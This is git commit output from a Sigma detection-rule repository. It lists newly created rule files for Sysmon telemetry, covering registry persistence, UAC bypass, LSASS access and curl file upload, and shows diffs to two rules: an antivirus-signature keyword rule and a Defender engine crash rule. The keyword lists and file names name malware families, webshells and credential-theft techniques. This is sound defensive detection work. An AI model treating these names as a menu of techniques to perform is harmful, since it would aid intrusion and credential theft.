create mode 100644 
tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bginfo_custom_db.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bginfo_custom_vbscript.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_blackbyte_ransomware.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_change_rdp_port.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_change_security_zones.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_change_winevt_channelaccess.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_chrome_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_clickonce_trust_prompt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_cobaltstrike_service_installs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_comhijack_sdclt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_crashdump_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_creation_service_susp_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_creation_service_uncommon_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_defender_exclusions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_desktop_background_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_dhcp_calloutdll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_administrative_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_autologger_sessions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_defender_firewall.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_function_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_macroruntimescanscope.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_privacy_settings_experience.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_security_center_notifications.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_system_restore.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_uac_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_windows_defender_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_windows_firewall.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_winevt_logging.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disallowrun_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_dns_over_https_enabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_dot_net_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_enabling_turnoffcheck.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_evtx_file_key_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_fax_change_service_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_fax_dll_persistance.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_file_association_exefile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hangs_debugger_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hhctrl_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hidden_extention.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hide_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hide_function_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_ime_non_default_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_ime_suspicious_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_install_root_or_ca_certificat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_legalnotice_susp_message.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_lsass_usermode_dumping.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_mal_adwind.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_mal_blue_mockingbird.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_new_application_appcompat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_new_network_provider.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_odbc_driver_registered.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_odbc_driver_registered_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_access_vbom_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_disable_protected_view_features.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_enable_dde.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_outlook_security_settings.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_trust_record_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_trusted_location_uncommon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_vba_warnings_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_app_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_appx_debugger.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_autodial_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_chm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_globalflags.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_ie.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_ifilter.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_lsa_extension.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_mpnotify.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_mycomputer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_natural_language.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_office_vsto.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_outlook_homepage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_outlook_todaypage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_reflectdebugger.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_scrobj_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_search_order.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_shim_database.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_typed_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_xll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_policies_associations_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_policies_attachments_tamper.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_powershell_as_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_powershell_execution_policy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_powershell_in_run_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_powershell_logging_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_provisioning_command_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_servicedll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_services_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_set_nopolicies_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_sip_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_sophos_av_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_special_accounts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_suppress_defender_notifications.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_keyboard_layout_load.yml create 
mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_printer_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_run_key_img_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_service_installed.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_user_shell_folders.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_suspicious_env_variables.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_system_lsa_nolmhash.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_taskcache_entry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_telemetry_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_terminal_server_suspicious.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_terminal_server_tampering.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_timeproviders_dllname.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_treatas_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_turn_on_dev_features.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_uac_bypass_eventvwr.yml 
create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_uac_bypass_sdclt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_uac_bypass_winsat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_uac_bypass_wmp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_vbs_payload_stored.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_wab_dllpath_reg_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_windows_defender_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_winget_admin_settings_tampering.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_winget_enable_local_manifest.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_winlogon_notify_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_config_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_config_modification_error.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_config_modification_status.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_file_block_executable.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_file_block_shredding.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_file_executable_detected.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/threat-hunting/create_remote_thread/create_remote_thread_win_powershell_generic.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_delete/file_delete_win_zone_identifier_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_event/file_event_win_dump_file_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_event/file_event_win_scheduled_task_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_event/file_event_win_susp_binary_dropper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_event/file_event_win_vscode_tunnel_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_event/file_event_win_webdav_tmpfile_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/image_load/image_load_dll_amsi_uncommon_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/image_load/image_load_dll_system_drawing_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/image_load/image_load_office_excel_xll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/image_load/image_load_wmi_module_load_by_uncommon_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/network_connection/net_connection_win_dfsvc_suspicious_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_access/proc_access_win_lsass_powershell_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_access/proc_access_win_lsass_susp_source_process.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/threat-hunting/process_access/proc_access_win_lsass_uncommon_access_flag.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_curl_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_curl_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_net_quic.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/registry/registry_event/registry_event_scheduled_task_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/dns_query_win_possible_dns_rebinding.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_clip+_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_stdin+_services.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_var+_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_compress_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_var++_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_tap_driver_installation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/file_event_executable_and_script_creation_by_office_using_file_ext.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/image_load_mimikatz_inmemory_detection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/sysmon_non_priv_program_files_move.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/win_possible_privilege_escalation_using_rotten_potato.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/win_suspicious_werfault_connection_outbound.yml create mode 100644 tools/sigmac/converted_rules/sysmon/wmi_event/sysmon_wmi_event_subscription.yml create mode 100644 tools/sigmac/converted_rules/sysmon/wmi_event/sysmon_wmi_susp_encoded_scripts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/wmi_event/sysmon_wmi_susp_scripting.yml
diff --git a/sigma/builtin/application/Other/win_av_relevant_match.yml b/sigma/builtin/application/Other/win_av_relevant_match.yml
index d86194883..0e6c0bce3 100644
--- a/sigma/builtin/application/Other/win_av_relevant_match.yml
+++ b/sigma/builtin/application/Other/win_av_relevant_match.yml
@@ -1,8 +1,7 @@
 title: Relevant Anti-Virus Signature Keywords In Application Log
 id: 78bc5783-81d9-4d73-ac97-59f6db4f72a8
 status: test
-description: Detects potentially highly relevant antivirus events in the application
- log based on known virus signature names and malware keywords.
+description: Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.
 references:
 - https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31
 - https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed
@@ -84,13 +83,20 @@ detection:
 - TeslaCrypt
 - Valyria
 - Webshell
+ # - 'FRP.'
+ # - 'PWS.'
+ # - 'PWSX'
+ # - 'Razy'
+ # - 'Ryuk'
+ # - 'Locker'
+ # - 'Potato'
 filter_optional_generic:
 - Keygen
 - Crack
 - anti_ransomware_service.exe
 - cyber-protect-service.exe
 filter_optional_information:
- Level: 4
+ Level: 4 # Information level
 filter_optional_restartmanager:
 Provider_Name: Microsoft-Windows-RestartManager
 condition: application and (keywords and not 1 of filter_optional_*)
diff --git a/sigma/builtin/application/application_error/win_application_msmpeng_crash_error.yml b/sigma/builtin/application/application_error/win_application_msmpeng_crash_error.yml
index a5225f75d..44fba0f5a 100644
--- a/sigma/builtin/application/application_error/win_application_msmpeng_crash_error.yml
+++ b/sigma/builtin/application/application_error/win_application_msmpeng_crash_error.yml
@@ -1,11 +1,10 @@
 title: Microsoft Malware Protection Engine Crash
 id: 545a5da6-f103-4919-a519-e9aec1026ee4
 related:
- - id: 6c82cf5c-090d-4d57-9188-533577631108
- type: similar
+ - id: 6c82cf5c-090d-4d57-9188-533577631108
+ type: similar
 status: experimental
-description: This rule detects a suspicious crash of the Microsoft Malware Protection
- Engine
+description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
 references:
 - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5
 - https://technet.microsoft.com/en-us/library/security/4022344
@@ -19,6 +18,7 @@ tags:
 logsource:
 product: windows
 service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
 detection:
 application:
 Channel: Application
diff --git a/sigma/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml b/sigma/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml
index 241a1e348..1a1ab0f85 100644
